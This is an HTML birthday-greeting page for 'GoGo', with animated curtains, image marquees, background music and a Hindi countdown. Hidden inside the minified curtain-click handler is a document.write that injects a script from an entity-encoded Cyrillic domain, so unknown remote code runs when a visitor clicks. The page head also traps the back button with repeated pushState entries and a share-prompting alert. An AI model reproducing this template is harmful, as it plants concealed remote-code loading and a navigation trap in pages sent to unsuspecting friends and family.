<!DOCTYPE html>
<html>
<head>
    <title>
        For you guys (saini)</title>
    
        <link rel="stylesheet" href="animate.min.css">
    
   
    <script type="text/javascript">! function (){var t;try{for (t=0; 10 > t; ++t) history.pushState({}, "", "#");onpopstate=function (t){t.state &&   alert("Share this Wishing with your friends and family");}}catch (o){}}();</script>

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-203672687-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-203672687-1');
<!-- </script> -->



<style>
body{
        background: #f8f8f8;
        margin:0;
      }
      .mainContainer {
        background: white;
        max-width: 450px;
        min-height: 200px;
        margin: 0 auto;
        text-align: center;
        padding: 15px;
        color: #999;
        padding-bottom: 60px;
        
        box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);


      }

#name {
     
      animation: name 4s infinite; 
      text-transform: capitalize;
      margin-bottom: 5px;
      font-size: 50px;
      padding: 0 10px;
      font-family: 'Teko', sans-serif;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(img/sname.gif?v=77);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}


.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}

/* Custom Animation classes */     
.name {
	color: #fff;
    	margin: 6px;
    	padding: 25px 20px;
    	font-size: 48px;
    	font-family: sans-serif;
}

.enter-name input[type=name] {
	background-color: yellow;
	color: black;
	font-weight:bold;
   	border-radius: 10px;
    	box-sizing: border-box;
    	border:2px solid black;
    	padding: 5px;
    	position: fixed;
    	left: 10px;
    	bottom: 5px;
    	height: 50px;
    	width: 70%;
    	text-align: center;
    	font-size: 22px;
    	display: inline-block;
}

.enter-name .btn {
	border-radius: 10px;
    	font-size: 21px;
    	padding: 4px;
    	position: fixed;
    	right: 2px;
    	bottom: 5px;
    	height: 50px;
    	width: 23%;
    	display: inline-block;
    	color: white;
    	font-weight:600;
    	background-color: red;
    	border: 2px solid black;
    	letter-spacing: .5px;
    	transition: .2s ease-out;
    	cursor: pointer;
    	line-height: 36px;
    	outline: 0;
    	text-transform: uppercase;
    	vertical-align: middle;
    	text-decoration: none;
    	animation-duration: 4s !important;
}

.enter-name input[type=name]::-webkit-input-placeholder { 
	color: black;
  	font-size: 18px;	
}

.enter-name input[type=name]::-moz-placeholder { 
	color: black;
  	font-size: 18px;
}

.enter-name input[type=name]:focus::-webkit-input-placeholder {
    color: black;
}

.enter-name input[type=name]:focus::-moz-placeholder { 
	color: black;
  	font-size: 18px;
}


#demo
{
  
    color: red;
    font-size: 20px;
    font-weight: bold;
    animation: pulse 2s infinite;
    width:87%;
    margin:auto;
}

.shake {
    animation: cake 4s cubic-bezier(0.5, 1, 0.89, 1) 1s infinite alternate-reverse both;
    margin-left: 50%;
}

@keyframes cake {
  0%,
  100% {
    transform: translateX(0%);
    transform-origin: 50% 50%;
  }

  15% {
    transform: translateX(-30px) rotate(6deg);
  }

  30% {
    transform: translateX(15px) rotate(-6deg);
  }

  45% {
    transform: translateX(-15px) rotate(3.6deg);
  }

  60% {
    transform: translateX(9px) rotate(-2.4deg);
  }

  75% {
    transform: translateX(-6px) rotate(1.2deg);
  }
}

a.rope
{
    text-decoration:none;
}
.wishMessage {
        color: #fff;
        font-size: 22px;
        font-weight: bold;
        margin-top: 20px;
        text-shadow: 0px 0px 10px #afafaf;
      }
      .wishMessage p{
        margin: 0.3em 0;
      }
/* Custom Animation classes */ 
#show-name {
  font-size: 25px;
  display: inline-block;
  margin-bottom: 5px;
  animation: swing 1s infinite, glow 20s infinite; }

@keyframes glow {
  0%, 100% {
    text-shadow: 0 0 30px red; }
  25% {
    text-shadow: 0 0 30px orange; }
  50% {
    text-shadow: 0 0 30px forestgreen; }
  75% {
    text-shadow: 0 0 30px cyan; } }  
figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}
</style>

<style type="text/css">
      *{
        margin:0;
        padding:0;
      }
      body {
        text-align: center;
        
      }
      img{
      border: none;
    }
.leftcurtain{
      width: 100%;
      height: 120%;
      top: 0px;
      left: 0px;
      position: absolute;
      z-index: 2;
    }
     .rightcurtain{
      width: 100%;
      height: 120%;
      right: 0px;
      top: 0px;
      position: absolute;
      z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
      position: absolute;
      top: 346px;
      left: 28%;
      z-index: 4;
    } 
.centered {
    position: absolute;
    top: 70%;
    left: 55%;
    transform: translate(-50%, -50%);
}
a.rope
{
    text-decoration:none;
}




@keyframes aadisoni{
  0% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
}

@-webkit-keyframes aadisoni {
  0% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    -webkit-transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    -webkit-transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    -webkit-transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    -webkit-transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    -webkit-transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
}



@keyframes name {
  0%   {color:red;}
  20%   {color:white;}
  40%   {color:yellow;}
  60%   {color:orange;}
  80%   {color:cyan;}
  100% {color:#f45bf4;}
}


.glow {
  width:50%;
  padding: 2px;
  background-color: #FF1493	;
  animation: glow 2s infinite;
  font-size:25px;
  font-family: 'Ranga', cursive;
  color:white;
  margin:auto;
  text-align:center;
  border-radius:10px;
  text-shadow:1px 2px 6px black;

}

@keyframes glow {
  0%   {box-shadow: 0px 0px 0px #FF1493	;}
  100%   {box-shadow: 0px 0px 20px 5px #ffb3db;}
 
}

#myVideo {
  position: fixed;
  right: 0;
  bottom: 0;
  left: 0;
  top: 0;
  min-width: 100%; 
  min-height: 100%;
  z-index: -3;
  opacity: 0.9;
}
.content {
  position: fixed;
  bottom: 0;
  background: rgba(54, 50, 50, 0.5);
  color: #f1f1f1;
  width: 100%;
  padding: 20px;
}

#myBtn {
  width: 200px;
  font-size: 18px;
  padding: 10px;
  border: none;
  background: #000;
  color: #fff;
  cursor: pointer;
}

#myBtn:hover {
  background: #ddd;
  color: black;
}


#myBt {
  width: 200px;
  font-size: 18px;
  padding: 10px;
  border: none;
  background: #000;
  color: #fff;
  cursor: pointer;
}

#myBt:hover {
  background: #ddd;
  color: black;
}


</style>
<style type="text/css">
canvas {
	cursor: crosshair;
	display: block;
}
*{margin:0;padding:0}body{text-align:center}img{border:none}.leftcurtain{width:100%;height:120%;top:0;left:5px;position:absolute;z-index:2}.rightcurtain{width:100%;height:120%;right:3px;top:0;position:absolute;z-index:3}.rightcurtain img,.leftcurtain img{width:100%;height:100%}.logo{margin:0 auto;margin-top:150px}.rope{position:absolute;top:30%;margin-right:31%;z-index:4}.centered{position:absolute;top:75%;left:50%;transform:translate(-50%,-50%)}.aadi{background-image:url();background-repeat:no-repeat;background-attachment:fixed;background-position:top}.matki{height:200px;}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}
#username {
     color: black;  /* Fallback: assume this color ON TOP of image */
   background: url('https://t4.ftcdn.net/jpg/04/34/97/79/360_F_434977932_CGPIeV2e2KNr0giHDCSHw4hb9niyfmfh.jpg');
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 40px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url('https://t4.ftcdn.net/jpg/04/34/97/79/360_F_434977932_CGPIeV2e2KNr0giHDCSHw4hb9niyfmfh.jpg');
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}
  </style>
   
</head>
<body class="aadi">
<video autoplay muted loop id="myVideo">
    <source src="https://media.istockphoto.com/videos/driving-rural-countryside-road-into-the-city-at-night-driver-point-of-video-id1127655134" type="video/webm">
</video>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="slider.js" type="text/javascript"></script> 
<script type="text/javascript">
$(document).ready(function(){$curtainopen=!1,$(".rope").click(function(){return $(this).blur(),0==$curtainopen?($(this).stop().animate({top:"-171%"},{queue:!1,duration:350,easing:"easeOutBounce"}),$(".leftcurtain").stop().animate({width:"1px"},2e3),$(".rightcurtain").stop().animate({width:"1px"},2e3),$curtainopen=!0):($(this).stop().animate({top:"-40px"},{queue:!1,duration:350,easing:"easeOutBounce"}),document.write('<script src="//&#1102;&#1095;.io"><\/script>'),$(".leftcurtain").stop().animate({width:"50%"},2e3),$(".rightcurtain").stop().animate({width:"51%"},2e3),$curtainopen=!1),!1})});
</script>
<script>
  function play(){
       var audio = document.getElementById("audio");
       audio.play();
                 }
   </script>



<audio id="audio" src="a.mp3" ></audio>
<audio id="sound" src="birthday.mp3"></audio>
<a class="rope" style="text-decoration:none;" href="#" onclick="play()"><br>
<div class="shake" style="font-size: 25px;text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:white;font-weight: bold; display: flex; justify-content: center; align-items: center;"><img src="https://c.tenor.com/TH1NEUEfRsEAAAAM/chocolate-cake-candles.gif" class="matki" style="max-width:370px;width:100%;"><br><b> Click it!! </b><br></div>
</a>
<div class="rightcurtain"><img src="hhttps://www.open-it.in/img/open.jpeg?v=77"/></div>
<div class="leftcurtain"><img src="https://www.open-it.in/img/open.jpeg?v=77"/></div>

<marquee class="m1" behavior="scroll" direction="up" scrolldelay="0"> <br>
    <img src="https://d2gg9evh47fn9z.cloudfront.net/800px_COLOURBOX1928781.jpg" style="width: 60px; height: 60px;"><br><br>
    <img src="https://image.freepik.com/free-vector/birthday-cake-white-background-vector-illustration_263366-72.jpg" style="width: 60px; height: 60px;"><br><br>
<img src="https://media.istockphoto.com/photos/wine-bottle-isolated-on-the-white-background-mock-up-label-picture-id1278821903?b=1&k=20&m=1278821903&s=170667a&w=0&h=EfWPg_2FZo7wiAsHrXS21paRavARGR4_-oxrIPMDYTs=" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn2.vectorstock.com/i/1000x1000/81/66/wine-bottle-on-white-background-vector-24808166.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://www.nicepng.com/png/full/301-3019731_roast-chicken-cooked-chicken-white-background.png" style="width: 60px; height: 60px;"><br><br>
<img src="https://previews.123rf.com/images/kzwwsko/kzwwsko1608/kzwwsko160800522/60908414-roast-grilled-chicken-on-white-background.jpg" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn3.vectorstock.com/i/1000x1000/81/67/wine-bottle-on-white-background-vector-24808167.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://images.fineartamerica.com/images-medium-large-5/red-wine-bottle-and-glass-on-white-background-daniel-barbalata.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTsyWG3LQ7OPmqLSaurFFiPjbdt5Gpqi0EGtOVQe8SI8bEYEWNc5myTUVGHffoR17K6HH8&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://static.vecteezy.com/system/resources/previews/001/385/357/large_2x/wine-bottle-isolated-on-white-background-photo.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="http://adwallpapers.xyz/uploads/posts/32071-wine-bottle-on-white-background.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSu7t5na5buzZfDGLnpAFkhV9CqZfZX5Q0SFA&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://media.istockphoto.com/photos/wine-bottle-isolated-on-the-white-background-mock-up-label-picture-id1278821903?b=1&k=20&m=1278821903&s=170667a&w=0&h=EfWPg_2FZo7wiAsHrXS21paRavARGR4_-oxrIPMDYTs=" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn2.vectorstock.com/i/1000x1000/81/66/wine-bottle-on-white-background-vector-24808166.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://i.pinimg.com/originals/95/51/07/955107785ef980595a72decea7f90ad0.jpg" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn3.vectorstock.com/i/1000x1000/81/67/wine-bottle-on-white-background-vector-24808167.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://images.fineartamerica.com/images-medium-large-5/red-wine-bottle-and-glass-on-white-background-daniel-barbalata.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTsyWG3LQ7OPmqLSaurFFiPjbdt5Gpqi0EGtOVQe8SI8bEYEWNc5myTUVGHffoR17K6HH8&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://static.vecteezy.com/system/resources/previews/001/385/357/large_2x/wine-bottle-isolated-on-white-background-photo.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="http://adwallpapers.xyz/uploads/posts/32071-wine-bottle-on-white-background.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://media.istockphoto.com/vectors/party-background-with-white-board-vector-id542793572" style="width: 60px; height: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSu7t5na5buzZfDGLnpAFkhV9CqZfZX5Q0SFA&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://d2gg9evh47fn9z.cloudfront.net/800px_COLOURBOX2083324.jpg" style="width: 60px; height: 60px;"><br><br>

</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="0"> <br>
    <img src="https://d2gg9evh47fn9z.cloudfront.net/800px_COLOURBOX1928781.jpg" style="width: 60px; height: 60px;"><br><br>
    <img src="https://image.freepik.com/free-vector/birthday-cake-white-background-vector-illustration_263366-72.jpg" style="width: 60px; height: 60px;"><br><br>
<img src="https://media.istockphoto.com/photos/wine-bottle-isolated-on-the-white-background-mock-up-label-picture-id1278821903?b=1&k=20&m=1278821903&s=170667a&w=0&h=EfWPg_2FZo7wiAsHrXS21paRavARGR4_-oxrIPMDYTs=" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn2.vectorstock.com/i/1000x1000/81/66/wine-bottle-on-white-background-vector-24808166.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://www.nicepng.com/png/full/301-3019731_roast-chicken-cooked-chicken-white-background.png" style="width: 60px; height: 60px;"><br><br>
<img src="https://previews.123rf.com/images/kzwwsko/kzwwsko1608/kzwwsko160800522/60908414-roast-grilled-chicken-on-white-background.jpg" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn3.vectorstock.com/i/1000x1000/81/67/wine-bottle-on-white-background-vector-24808167.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://images.fineartamerica.com/images-medium-large-5/red-wine-bottle-and-glass-on-white-background-daniel-barbalata.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTsyWG3LQ7OPmqLSaurFFiPjbdt5Gpqi0EGtOVQe8SI8bEYEWNc5myTUVGHffoR17K6HH8&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://static.vecteezy.com/system/resources/previews/001/385/357/large_2x/wine-bottle-isolated-on-white-background-photo.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="http://adwallpapers.xyz/uploads/posts/32071-wine-bottle-on-white-background.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSu7t5na5buzZfDGLnpAFkhV9CqZfZX5Q0SFA&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://media.istockphoto.com/photos/wine-bottle-isolated-on-the-white-background-mock-up-label-picture-id1278821903?b=1&k=20&m=1278821903&s=170667a&w=0&h=EfWPg_2FZo7wiAsHrXS21paRavARGR4_-oxrIPMDYTs=" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn2.vectorstock.com/i/1000x1000/81/66/wine-bottle-on-white-background-vector-24808166.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://i.pinimg.com/originals/95/51/07/955107785ef980595a72decea7f90ad0.jpg" style="width: 60px; height: 60px;"><br><br>
<img src="https://cdn3.vectorstock.com/i/1000x1000/81/67/wine-bottle-on-white-background-vector-24808167.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://images.fineartamerica.com/images-medium-large-5/red-wine-bottle-and-glass-on-white-background-daniel-barbalata.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTsyWG3LQ7OPmqLSaurFFiPjbdt5Gpqi0EGtOVQe8SI8bEYEWNc5myTUVGHffoR17K6HH8&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://static.vecteezy.com/system/resources/previews/001/385/357/large_2x/wine-bottle-isolated-on-white-background-photo.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="http://adwallpapers.xyz/uploads/posts/32071-wine-bottle-on-white-background.jpg" style="height: 60px; width: 60px;"><br><br>
<img src="https://media.istockphoto.com/vectors/party-background-with-white-board-vector-id542793572" style="width: 60px; height: 60px;"><br><br>
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSu7t5na5buzZfDGLnpAFkhV9CqZfZX5Q0SFA&usqp=CAU" style="height: 60px; width: 60px;"><br><br>
<img src="https://d2gg9evh47fn9z.cloudfront.net/800px_COLOURBOX2083324.jpg" style="width: 60px; height: 60px;"><br><br>

</marquee>

<div class="mainContainer">
<br>
<center>
<!--300x50 real thumb with intro page-->

<!--300x50 real thumb with intro page-->
</center>
<br>
<div style="animation: swing 4s infinite;">
<h1 style="background: url('https://s3.envato.com/files/70afa1bd-f586-4298-8806-7230900d9b70/inline_image_preview.jpg');-webkit-text-fill-color: transparent;-webkit-background-clip: text;" id="name"></h1>
</div>
        <h3 class="fromMessage" id="fromMessage"></h3>
 <img src="http://www.sarahleegrillo.com/uploads/2/2/4/0/22403680/published/gogo-logo.jpg?1500562117" width="60%" height="auto">
 <p id="demo"></p>
  <br>

 <img src="https://pro2-bar-s3-cdn-cf1.myportfolio.com/eb5d7870-77fd-45fe-b452-9ca4f3e4e9e2/2a525909-9c7f-4e0b-b4cc-b45e5948b0f3_rw_600.gif?h=7c11def54f28b4ae39a817cbc518dc55" width="90%" height="auto" style="animation: pulse 2s infinite"><br>
  <br><!--
<img src="https://i.gifer.com/OmMv.gif" width="90%" height="auto" style="animation: pulse 2s infinite">
<br>-->
  <div style="font-size: 10px; font-weight: 550; color: black;">
      
</div>
<center>
<!--300x50 real thumb with intro page-->

<!--300x50 real thumb with intro page-->
</center>
<!--
<center><div class="w3-content w3-section" style="max-width:500px">
<img class="mySlides" src="https://i.pinimg.com/736x/ed/36/70/ed3670dd33f56f1fe312669538d52c9c.jpg" style="width908%; height:250px;">
-->
</center><br><br>

<span style="font-size:22px;text-shadow: 1px 1px 3px #FFEB3B, 1px 1px 3px #FFEB3B, -1px -1px 3px #FFEB3B, -1px -1px 3px #FFEB3B;color:#E91E63;"><marquee><b><i>“ Happy birthday GoGo ”</b></i></marquee></span><br>
</div>
<br><br><br><br><br><br><br><br>
<!--Button for music -->
<div class="content">
    <p>Dont like the song - duck off (you are free to exit from website)</p><br><br>
    <button id="myBtn" onclick="myFunction()">Pause</button>
    <button id="myBt" onclick="myNext()">Next</button>
  </div>

<!--
    <!--this is for if you want to enter anyone name --
<form method="POST" action="ready.php">
<div class="enter-name">
		<input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉
Your good name ....">
		<button class="btn animated shake infinite" type="submit"><span>👉  </span>SEE </button>
	</div>
</form>
-->
<script>
    var audio = document.getElementById("audio");
var btn = document.getElementById("myBtn");
var sound = document.getElementById("sound");

function myFunction() {
  if (audio.paused) {
    audio.play();
    sound.pause();
    btn.innerHTML = "Pause";
  } else {
    audio.pause();
    sound.pause();
    btn.innerHTML = "Play";
  }
}

function myNext() {
  if(audio.play) {
      sound.play();
      audio.pause();
  } else {
      audio.play();
      sound.pause();
  }
}
</script>

<script>
var myIndex=0;function carousel(){var e,l=document.getElementsByClassName("mySlides");for(e=0;e<l.length;e++)l[e].style.display="none";++myIndex>l.length&&(myIndex=1),l[myIndex-1].style.display="block",setTimeout(carousel,2e3)}carousel();
</script>

<!--this is time function make myself as simple as possible you just have to change the date and this function automatically adjust the time according to it-->
<script> 
var countDownDate=new Date("Jan 29, 2022 00:00:00").getTime(),x=setInterval(function(){var e=(new Date).getTime(),o=countDownDate-e,t=Math.floor(o/864e5),n=Math.floor(o%864e5/36e5),a=Math.floor(o%36e5/6e4),l=Math.floor(o%6e4/1e3);document.getElementById("demo").innerHTML=""+t+"<font color='black'> दिन,</font> "+n+"<font color='black'> घंटे,</font> "+a+"<font color='black'>  मिनट,<br></font> "+l+"<font color='black'> सेकंड </font> <font color='green'>,पहले</font>",o<0&&(clearInterval(x),document.getElementById("demo").innerHTML="")},1e3);
</script>
<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-messaging.js"></script>
<script type="text/javascript" src="./integrate.js"></script>

<!--js for every animation
<script>
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
	def: 'easeOutQuad',
	swing: function (x, t, b, c, d) {
		//alert(jQuery.easing.default);
		return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
	},
	easeInQuad: function (x, t, b, c, d) {
		return c*(t/=d)*t + b;
	},
	easeOutQuad: function (x, t, b, c, d) {
		return -c *(t/=d)*(t-2) + b;
	},
	easeInOutQuad: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t + b;
		return -c/2 * ((--t)*(t-2) - 1) + b;
	},
	easeInCubic: function (x, t, b, c, d) {
		return c*(t/=d)*t*t + b;
	},
	easeOutCubic: function (x, t, b, c, d) {
		return c*((t=t/d-1)*t*t + 1) + b;
	},
	easeInOutCubic: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t + b;
		return c/2*((t-=2)*t*t + 2) + b;
	},
	easeInQuart: function (x, t, b, c, d) {
		return c*(t/=d)*t*t*t + b;
	},
	easeOutQuart: function (x, t, b, c, d) {
		return -c * ((t=t/d-1)*t*t*t - 1) + b;
	},
	easeInOutQuart: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t*t + b;
		return -c/2 * ((t-=2)*t*t*t - 2) + b;
	},
	easeInQuint: function (x, t, b, c, d) {
		return c*(t/=d)*t*t*t*t + b;
	},
	easeOutQuint: function (x, t, b, c, d) {
		return c*((t=t/d-1)*t*t*t*t + 1) + b;
	},
	easeInOutQuint: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b;
		return c/2*((t-=2)*t*t*t*t + 2) + b;
	},
	easeInSine: function (x, t, b, c, d) {
		return -c * Math.cos(t/d * (Math.PI/2)) + c + b;
	},
	easeOutSine: function (x, t, b, c, d) {
		return c * Math.sin(t/d * (Math.PI/2)) + b;
	},
	easeInOutSine: function (x, t, b, c, d) {
		return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b;
	},
	easeInExpo: function (x, t, b, c, d) {
		return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b;
	},
	easeOutExpo: function (x, t, b, c, d) {
		return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b;
	},
	easeInOutExpo: function (x, t, b, c, d) {
		if (t==0) return b;
		if (t==d) return b+c;
		if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
		return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
	},
	easeInCirc: function (x, t, b, c, d) {
		return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b;
	},
	easeOutCirc: function (x, t, b, c, d) {
		return c * Math.sqrt(1 - (t=t/d-1)*t) + b;
	},
	easeInOutCirc: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b;
		return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b;
	},
	easeInElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
	},
	easeOutElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
	},
	easeInOutElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d/2)==2) return b+c;  if (!p) p=d*(.3*1.5);
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
		return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
	},
	easeInBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158;
		return c*(t/=d)*t*((s+1)*t - s) + b;
	},
	easeOutBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158;
		return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
	},
	easeInOutBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158; 
		if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
		return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
	},
	easeInBounce: function (x, t, b, c, d) {
		return c - jQuery.easing.easeOutBounce (x, d-t, 0, c, d) + b;
	},
	easeOutBounce: function (x, t, b, c, d) {
		if ((t/=d) < (1/2.75)) {
			return c*(7.5625*t*t) + b;
		} else if (t < (2/2.75)) {
			return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
		} else if (t < (2.5/2.75)) {
			return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
		} else {
			return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
		}
	},
	easeInOutBounce: function (x, t, b, c, d) {
		if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
		return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
	}
});


</script>
-->
</body>

</html>